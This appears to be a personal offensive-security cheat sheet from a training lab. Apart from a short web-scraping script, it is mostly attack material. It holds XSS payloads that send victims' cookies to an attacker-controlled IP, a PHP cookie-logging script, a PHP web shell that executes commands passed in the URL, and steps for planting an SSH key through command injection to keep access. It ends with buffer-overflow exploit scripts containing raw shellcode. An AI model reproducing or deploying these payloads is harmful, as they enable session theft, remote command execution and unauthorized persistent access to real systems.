Scraping Data, html
  #!/usr/bin/python
  ### Imports ###
  import lxml.html
  import requests
   
  ### Grabs the webpage ###
  page = requests.get('http://quotes.toscrape.com')
  tree = lxml.html.fromstring(page.content)
   
  ### Outlines the tag you want to grab ###
  # Change //small[...[ to whatever tag. Leave /text() as is
  results = tree.xpath('//small[@class="author"]/text()')
  
  ### Prints it out ###
  print ('Results: ',results)
  

COOKIE STEALING!
 run on opstation: 
  python3 -m http.server using   <script>document.location="http://10.50.38.82:8000/"+document.cookie;</script>

-----OR-----
<?php
$cookie = $_GET["username"]
$steal = fopen("/var/www/html/uploads/cookiefile.txt", "a+");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
(Cookie_Stealer.php)

using      <script>document.location="http://serveripport/uploads/cookie_stealer.php?username="+document.cookie;</script>






WEB SHELL:
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>




SSH KEYGEN:
ssh-keygen -t rsa -b 4096 ( on lin-ops) in .ssh

##NEED COMMAND INJECTION OR WEBSHELL##
### verify locations and folders/files before ^^!!!!
 ls -la /users/home/directory      #check if .ssh exists
 mkdir /users/home/directory/.ssh  (/var/www/.ssh)
 
copy to user(whoami) home page /../.ssh
echo "key" >> /../.ssh/authorized_keys  (/var/www/.ssh)
cat to verify

ssh -i .ssh/id_rsa www-data@10.50.37.95








#! /usr/bin/python3

offset = "A" * 71
eip = "B" * 4

#eip = "\x0f\x46\xf6\xf7"   #reverse endian
#nop = "\x90" * 10

print(offset + eip )   #IN THIS ORDER






#! /usr/bin/python3

offset = "A" * 76
#eip = "B" * 4



eip = "\x97\x54\xf6\xf7"   #reverse endian
nop = "\x90" * 10


buf =  b""
buf += b"\xbe\xa0\xd6\x97\xc3\xda\xc2\xd9\x74\x24\xf4\x5b\x2b"
buf += b"\xc9\xb1\x0b\x31\x73\x14\x03\x73\x14\x83\xc3\x04\x42"
buf += b"\x23\xfd\xc8\xda\x55\x50\xa9\xb2\x48\x36\xbc\xa5\xfb"
buf += b"\x97\xcd\x41\xfc\x8f\x1e\xf3\x95\x21\xe8\x10\x37\x56"
buf += b"\xed\xd6\xb8\xa6\x85\xbe\xd7\xc7\x04\x57\x28\x5f\x84"
buf += b"\x2e\xc9\x92\xaa"

print(offset + eip + nop + buf  )   #IN THIS ORDER







